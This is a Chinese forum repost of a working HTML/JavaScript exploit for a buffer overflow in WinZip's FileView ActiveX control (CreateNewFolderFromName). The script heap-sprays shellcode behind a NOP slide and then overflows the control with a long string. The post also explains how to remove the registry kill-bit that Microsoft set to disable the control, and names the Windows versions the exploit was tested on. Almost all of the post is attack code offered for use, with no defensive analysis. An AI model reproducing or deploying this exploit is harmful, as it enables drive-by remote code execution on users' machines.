winzip FileView ActiveX Contorls CreateNewFolderFromName exploit
<p><font face="verdana, tahoma, helvetica" size="2">信息来源: Ph4nt0m.Org</font></p><p><font face="verdana, tahoma, helvetica" size="2">之前看到过一个FileView ActiveX控件溢出的,不过不是这个函数,网上公布的溢出代码也不是很好用,<br />这个是CreateNewFolderFromName函数溢出的,不过由于前面一个漏洞的问题,微软似乎禁用了这个控件,<br />测试时可以删除<br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A09AE68F-B14D-43ED-B713 <br /><br />-BA413F034904}]<br />"Compatibility Flags"=dword:00000400<br />元旦快乐!<br />Code: </font></p><p><table cellspacing="1" cellpadding="8" width="95%" align="center" bgcolor="#000000" border="0"><tbody><tr><td bgcolor="#ffffff"><code><font color="#000000"><font color="#0000bb"><br /></font><font face="新宋体"><font color="#007700"></< /><font color="#0000bb">body</font></font><font face="新宋体"><font color="#007700">> <br /></< /><font color="#0000bb">html</font></font><font face="新宋体"><font color="#007700">> <br /><</font><font color="#0000bb">head</font></font><font face="新宋体"><font color="#007700">> <br /><</font><font color="#0000bb">object classid</font><font color="#007700">=</font><font color="#dd0000">"clsid:{A09AE68F-B14D-43ED-B713-BA413F034904}" </font><font color="#0000bb">id</font><font color="#007700">=</font><font color="#dd0000">"winzip"</font></font><font face="新宋体"><font color="#007700">> <br /></< /><font color="#0000bb">object</font></font><font face="新宋体"><font color="#007700">> <br /></< /><font color="#0000bb">head</font></font><font face="新宋体"><font color="#007700">> <br /><br /><</font><font color="#0000bb">body</font></font><font face="新宋体"><font color="#007700">> <br /><br /><</font><font color="#0000bb">SCRIPT language</font><font color="#007700">=</font><font color="#dd0000">"javascript"</font></font><font face="新宋体" color="#007700">> <br /></font><font face="新宋体"><font color="#ff8000">/* <br />---===[ winzip-exploit.html <br /> <br />XiaoHui : 76693223[at]163.com <br />HomePage: <a href="[url]http://www.nipc.org.cn" target="_blank">www.nipc.org.cn</a> <br />(c) 2006 All rights reserved. <br />note:Because of the prior vuln in FileView ActiveX Control,Micorsoft has disabled this ActiveX Controls, <br />To test this vuln,You can delete the key: <br />[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{A09AE68F-B14D-43ED-B713 <br /><br />-BA413F034904}] <br />"Compatibility Flags"=dword:00000400 <br />I have test the exploit on Windows 2000+sp4(CN) and Windows xp+sp2(CN) and Winzip 10.0(6667),you can try <br /><br />other version,goodluck~ <br />]===--- <br />*/ <br /><br /></font><font color="#007700">var </font><font color="#0000bb">heapSprayToAddress </font><font color="#007700">= </font><font color="#0000bb">0x0d0d0d0d</font></font><font face="新宋体"><font color="#007700">; <br /><br />var </font><font color="#0000bb">payLoadCode </font><font color="#007700">= </font><font color="#0000bb">unescape</font><font color="#007700">(</font></font><font face="新宋体" color="#dd0000">"%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B% <br /><br />u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B% <br /><br />u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631% <br /><br />u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"</font><font face="新宋体"><font color="#007700">); <br /><br />var </font><font color="#0000bb">heapBlockSize </font><font color="#007700">= </font><font color="#0000bb">0x400000</font></font><font face="新宋体"><font color="#007700">; <br /><br />var </font><font color="#0000bb">payLoadSize </font><font color="#007700">= </font><font color="#0000bb">payLoadCode</font><font color="#007700">.</font><font color="#0000bb">length </font><font color="#007700">* </font><font color="#0000bb">2</font></font><font face="新宋体"><font color="#007700">; <br /><br />var </font><font color="#0000bb">spraySlideSize </font><font color="#007700">= </font><font color="#0000bb">heapBlockSize </font><font color="#007700">- (</font><font color="#0000bb">payLoadSize</font><font color="#007700">+</font><font color="#0000bb">0x38</font></font><font face="新宋体"><font color="#007700">); <br /><br />var </font><font color="#0000bb">spraySlide </font><font color="#007700">= </font><font color="#0000bb">unescape</font><font color="#007700">(</font><font color="#dd0000">"%u9090%u9090"</font></font><font face="新宋体"><font color="#007700">); <br /></font><font color="#0000bb">spraySlide </font><font color="#007700">= </font><font color="#0000bb">getSpraySlide</font><font color="#007700">(</font><font color="#0000bb">spraySlide</font><font color="#007700">,</font><font color="#0000bb">spraySlideSize</font></font><font face="新宋体"><font color="#007700">); <br /><br /></font><font color="#0000bb">heapBlocks </font><font color="#007700">= (</font><font color="#0000bb">heapSprayToAddress </font><font color="#007700">- </font><font color="#0000bb">0x400000</font><font color="#007700">)/</font><font color="#0000bb">heapBlockSize</font></font><font face="新宋体"><font color="#007700">; <br /><br /></font><font color="#0000bb">memory </font></font><font face="新宋体"><font color="#007700">= new Array(); <br /><br />for (</font><font color="#0000bb">i</font><font color="#007700">=</font><font color="#0000bb">0</font><font color="#007700">;</font><font color="#0000bb">i</font><font color="#007700"><</font><font color="#0000bb">heapBlocks</font><font color="#007700">;</font><font color="#0000bb">i</font></font><font face="新宋体"><font color="#007700">++) <br />{ <br /></font><font color="#0000bb">memory</font><font color="#007700">[</font><font color="#0000bb">i</font><font color="#007700">] = </font><font color="#0000bb">spraySlide </font><font color="#007700">+ </font><font color="#0000bb">payLoadCode</font></font><font face="新宋体"><font color="#007700">; <br />} <br /> <br /><br />var </font><font color="#0000bb">xh </font><font color="#007700">= </font><font color="#dd0000">'A'</font></font><font face="新宋体"><font color="#007700">; <br />while (</font><font color="#0000bb">xh</font><font color="#007700">.</font><font color="#0000bb">length </font><font color="#007700">< </font><font color="#0000bb">231</font><font color="#007700">) </font><font color="#0000bb">xh</font><font color="#007700">+=</font><font color="#dd0000">'A'</font></font><font face="新宋体"><font color="#007700">; <br /></font><font color="#0000bb">xh</font><font color="#007700">+=</font><font color="#dd0000">"x0dx0dx0dx0d"</font></font><font face="新宋体"><font color="#007700">; <br /></font><font color="#0000bb">winzip</font><font color="#007700">.</font><font color="#0000bb">CreateNewFolderFromName</font><font color="#007700">(</font><font color="#0000bb">xh</font></font><font face="新宋体"><font color="#007700">); <br />function </font><font color="#0000bb">getSpraySlide</font><font color="#007700">(</font><font color="#0000bb">spraySlide</font><font color="#007700">, </font><font color="#0000bb">spraySlideSize</font></font><font face="新宋体"><font color="#007700">) <br />{ <br />while (</font><font color="#0000bb">spraySlide</font><font color="#007700">.</font><font color="#0000bb">length</font><font color="#007700">*</font><font color="#0000bb">2</font><font color="#007700"><</font><font color="#0000bb">spraySlideSize</font></font><font face="新宋体"><font color="#007700">) <br />{ <br /></font><font color="#0000bb">spraySlide </font><font color="#007700">+= </font><font color="#0000bb">spraySlide</font></font><font face="新宋体"><font color="#007700">; <br />} <br /></font><font color="#0000bb">spraySlide </font><font color="#007700">= </font><font color="#0000bb">spraySlide</font><font color="#007700">.</font><font color="#0000bb">substring</font><font color="#007700">(</font><font color="#0000bb">0</font><font color="#007700">,</font><font color="#0000bb">spraySlideSize</font><font color="#007700">/</font><font color="#0000bb">2</font></font><font face="新宋体"><font color="#007700">); <br />return </font><font color="#0000bb">spraySlide</font></font><font face="新宋体"><font color="#007700">; <br />} <br /> <br /></font><font color="#0000bb"></script /></font> <br /><br /> <br /><br /></font><br /></font></font></font></font></font></code></td></tr></tbody></table></p>页:
[1]